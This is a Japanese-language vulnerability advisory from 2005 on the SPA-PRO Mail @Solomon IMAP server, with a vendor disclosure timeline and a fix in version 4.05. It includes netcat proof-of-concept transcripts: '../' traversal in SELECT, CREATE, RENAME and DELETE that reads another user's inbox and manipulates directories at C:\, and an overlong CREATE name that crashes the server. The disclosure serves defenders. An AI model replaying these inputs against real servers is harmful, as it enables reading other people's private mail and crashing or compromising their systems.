|
by Tan Chew Keong タン チュー ケオン
Release Date: 02 Jun 2005
English Version
SPA-PRO Mail
@Solomon
は 安定かつ高速のメールサーバです。Windows対応なので設定も簡単、メンテナンス費用も他社と比べて驚くほど低価格!!
大企業の拠点、部門サーバ、中堅企業や官公庁、自治体、教育機関、ホスティング業者のメールサーバとして最適です。
SPA-PRO Mail @Solomon の IMAP
サーバーにメールユーザのディレクトリより上位のフォルダにアクセスできる脆弱性があります。
悪意のある攻撃者は、この問題を利用し他のユーザのメール
を見る可能性があります。IMAP
サーバーの CREATE リクエストは Buffer Overflow 脆弱性もあります。悪意のある攻撃者は、この問題を利用し SPA-PRO
Mail @Solomon
の IMAP
サーバーを実行するユーザの権限で任意のコードを実行できる可能性があります。
SPA-PRO Mail @Solomon Version 4.00 (SPA-IMAP4S 4.01) on 日本語版の Win2K SP4
SPA-PRO Mail @Solomon の IMAP
サーバーにメールユーザのディレクトリより上位のフォルダにアクセスできる脆弱性があります。
悪意のある攻撃者は、この問題を利用し他のユーザのメール
を見る可能性があります。
IMAP リクエスト処理の不具合により、メールユーザのディレクトリより上のディレクトリにアクセスできる。 IMAP
リクエストの例は SELECT、CREATE、DELETE および RENAME が含まれている。
例
C:\>nc 192.168.2.102 143
* OK SPA-PRO IMAP4rev1 Server @Solomon (4.01) Ready. Licence will be expired in 30 days.
1 login "testuser2" "testuser2" // testuser2 でログイン
1 OK login completed
2 select "../testuser/inbox" // selected testuser's inbox
* 1 EXISTS
* 1 RECENT
* OK [UNSEEN 1] Message 1 is first unseen
* OK [UIDVALIDITY 893984814] UIDs valid
* OK [UIDNEXT 2] Predicted next UID
* FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
* OK [PERMANENTFLAGS (\Deleted \Seen \*)] Limited
2 OK [READ-WRITE] select completed
3 uid fetch 1:* (flags)
3 OK fetch completed
4 uid fetch 494564448 (UID RFC822.SIZE FLAGS BODY.PEEK[]) // testuser2 で testuser のメールを見られる
Received: from [192.168.2.101] (unverified [192.168.2.101]) by 2xeuqvc4h7yysw5
(SPA-PRO ESMTP Receiver @Solomon (4.07)) with ESMTP id <B0000000001@2xeuqvc4h7yysw5>;
Sat, 28 May 2005 12:45:06 +0800
Message-ID: <4297F754.8060305@security.org.sg>
Date: Sat, 28 May 2005 12:45:08 +0800
From: Chew Keong TAN
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: testuser@xxxxx
Subject: This is test subject
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
This is a test email.
)
4 OK fetch completed
5 create "../../../../../hacked" // C:\ に hacked ディレクトリを作成する
6 rename "../../../../../hacked" "../../../../../hacked2" // C:\ に hacked ディレクトリを変更する
6 OK rename successful
7 delete "../../../../../hacked2" // C:\ に hacked2 ディレクトリを削除する
7 OK delete successful
8 select "..\testuser\inbox" // Using back-slash works too.
* 1 EXISTS
* 1 RECENT
* OK [UNSEEN 1] Message 1 is first unseen
* OK [UIDVALIDITY 893984814] UIDs valid
* OK [UIDNEXT 2] Predicted next UID
* FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
* OK [PERMANENTFLAGS (\Deleted \Seen \*)] Limited
8 OK [READ-WRITE] select completed
IMAP
サーバーの CREATE リクエストは Buffer Overflow 脆弱性もあります。悪意のある攻撃者は、この問題を利用し SPA-PRO
Mail @Solomon
の IMAP
サーバーを実行するユーザの権限で任意のコードを実行できる可能性があります。それが CREATE
リクエスト中に異常長いディレクトリ名前を受け取る
とき、Buffer
Overflow が発生します。
C:\>nc 192.168.2.102 143
* OK SPA-PRO IMAP4rev1 Server @Solomon (4.01) Ready. Licence will be expired in 30 days.
1 login "testuser" "testuser"
1 OK login completed
2 create "AAAABBBBCCCCDDDDEEEEFFFF...[約 260 個]..."
CRASH...
このOllydbg の画面は脆弱性を示す。 Buffer Overflow テストコードこちら。
SPA-PRO Mail @Solomon の SPA-IMAP4S は、速やかに Version 4.05
へのバージョンアップをしてください。
| 2005年 05月 27日 |
- |
脆弱性の発見。 |
| 2005年 05月 28日 |
- |
脆弱性が電子メールで イー・ポスト 社に報告しました。 |
| 2005年 05月 30日 |
- |
再度脆弱性が電子メールで イー・ポスト 社に報告しました。 |
| 2005年 05月 30日 |
- |
イー・ポスト 社から、SPA-IMAP4S Version 4.03
バージョンアップをもらいました。しかし、メールユーザのディレクトリより上位のフォルダにアクセスできる脆弱性は
修正しない。さらに Buffer Overflow 脆弱性もあります。 |
| 2005年 05月 31日 |
- |
再度 イー・ポスト 社に報告しました。 |
| 2005年 05月 31日 |
- |
イー・ポスト 社から、SPA-IMAP4S Version 4.04
バージョンアップをもらいました。しかし、メールユーザのディレクトリより上位のフォルダにアクセスできる脆弱性は
修正しない。 |
| 2005年 05月 31日 |
- |
再度 イー・ポスト 社に報告しました。 |
| 2005年 05月 31日 |
- |
イー・ポスト 社から、SPA-IMAP4S Version 4.05
バージョンアップをもらいました。 |
| 2005年 06月 02日 |
- |
本脆弱性の公開。 |
For further questions and enquries, email them to the
following.
Overall-in-charge: Tan
Chew Keong
webmaster@security.org.sg |
